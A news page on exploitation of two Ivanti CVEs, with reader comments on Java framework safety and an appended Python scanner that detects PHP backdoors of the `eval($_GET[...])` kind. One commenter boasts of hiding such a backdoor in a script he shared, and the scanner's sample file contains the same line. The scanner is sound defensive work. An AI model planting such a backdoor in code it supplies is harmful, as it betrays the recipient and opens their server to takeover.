'Ongoing' Ivanti hijack bug exploitation reaches clouds

The "ongoing exploitation" of two Ivanti bugs has now extended beyond on-premises environments and hit customers' cloud instances, according to security shop Wiz. CVE-2025-4427 is an authentication bypass vulnerability and CVE-2025-4428 is a post-authentication remote-code execution (RCE) flaw. Together they allow a miscreant …

  1. kmorwath

    " if a CVE against the libraries is warranted."

    IF??? Especially if they are broadly used Java libraries. Still, someone should tell Java developers their code isn't safe just because it isn't C and does not use pointers. Especially in environments that can execute almost any string.

    1. abend0c4 Silver badge

      Re: " if a CVE against the libraries is warranted."

      This does seem similar in broad principle to the Log4j debacle - in that case it was a misconfiguration of JNDI allowing arbitrary code to be executed by default and in this case it seems to be a misconfiguration of Spring having the same effect. I can't help feeling that the default for all such frameworks - in the absence of explicit configuration to the contrary possibly involving the provision of a doctor's certificate - is that the silent execution of arbitrary code should perhaps be disabled? There are aspects of the Java ecosystem that seem to err on the side of recklessness. Not that it's the only culprit.

      I also understand that the Log4j problem keeps coming back as patched systems are subsequently reverted unintentionally. Hopefully that's less of a problem for a commercial product with a single origin.

    2. Anonymous Coward

      Re: " if a CVE against the libraries is warranted."

      A "safe language" is a "useless language". If I can't download a file and execute it, that language is probably useless for general software development. If I can then my code can potentially contain serious vulnerabilities.

      A long time ago I had a reason to "make a point" to someone who had been begging me for a copy of a php script that I had written for my website. I sent him a copy that had a simple eval($_GET['s']); hidden in the middle. I waited a couple of weeks for him to forget about this script before I started trolling the crap out of him, for his website was hosted on his main desktop PC. :)

      1. fg_swe Silver badge

        FALSE

        Properly designed I/O facilities of a memory-safe language can indeed be very secure and impossible to abuse.

        E.g. https://github.com/DiplIngFrankGerlach/Taschenrechner/blob/main/System.ad (the PrintfClass). Strongly typed languages offer the facilities to make printing and logging bulletproof. Just because American and Israeli software engineers fail at this effort means little.

        printf/sprintf, PHP and the Java contraption in question are badly designed.
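The eval($_GET['s']) backdoor in the Anonymous Coward's anecdote is exactly the pattern a code reviewer or CI check wants to catch before a script goes live. The scanner below is an added example, not code from the article or from any commenter: it flags PHP code sinks (eval, assert, create_function) that are fed by a request superglobal, either directly or through one intervening assignment, over a constructed sample file. Regex names, the sink list and the sample script are all assumptions of this example.

```python
import re

# Request superglobals carry attacker-controlled data; the sinks execute strings as PHP.
_SUPERGLOBAL_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
_SINK_RE = re.compile(r"\b(?P<sink>eval|assert|create_function)\s*\((?P<args>[^;]*)\)",
                      re.IGNORECASE)  # PHP function names are case-insensitive
# `$x = ... $_GET[...]` (a single `=`, not `==`) marks $x as carrying request data.
_ASSIGN_RE = re.compile(r"(?P<var>\$[A-Za-z_]\w*)\s*=(?!=)[^;]*\$_(?:GET|POST|REQUEST|COOKIE)\b")
_VAR_RE = re.compile(r"\$[A-Za-z_]\w*")


def find_request_to_eval(php_source):
    """Scan PHP source line by line and return (line, sink, snippet, reason) tuples
    for every code sink fed by a request superglobal, directly or via one assignment.
    Heuristic: comment-only lines are skipped, a call is assumed to sit on one line,
    and taint does not survive string building or passing through other functions."""
    tainted = set()
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), start=1):
        if line.strip().startswith(("//", "#", "*", "/*")):
            continue
        # Record assignments first so `$x = $_GET[...]; eval($x);` on one line is caught.
        for a in _ASSIGN_RE.finditer(line):
            tainted.add(a.group("var"))
        for m in _SINK_RE.finditer(line):
            args = m.group("args")
            if _SUPERGLOBAL_RE.search(args):
                reason = "direct"
            else:
                carriers = [v for v in _VAR_RE.findall(args) if v in tainted]
                if not carriers:
                    continue
                reason = "via " + ", ".join(carriers)
            findings.append((lineno, m.group("sink").lower(), m.group(0).strip(), reason))
    return findings


# Constructed sample: a harmless gallery script with a backdoor buried in the middle.
SAMPLE_PHP = """<?php
// constructed sample for the scanner above
$dir = 'images/';
$files = scandir($dir);
foreach ($files as $f) { echo "<img src='$dir$f'>"; }
eval($_GET['s']);
$cmd = $_POST['c'];
$out = evaluate_title($cmd);
eval($cmd);
// eval($_REQUEST['x']);  commented out, must not be reported
?>
"""

if __name__ == "__main__":
    for lineno, sink, snippet, reason in find_request_to_eval(SAMPLE_PHP):
        print(f"line {lineno}: {sink} on request data ({reason}): {snippet}")
```

Running it on the sample reports the direct eval on line 6 and the eval of $cmd on line 9, while the commented-out line and the evaluate_title() call are left alone.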
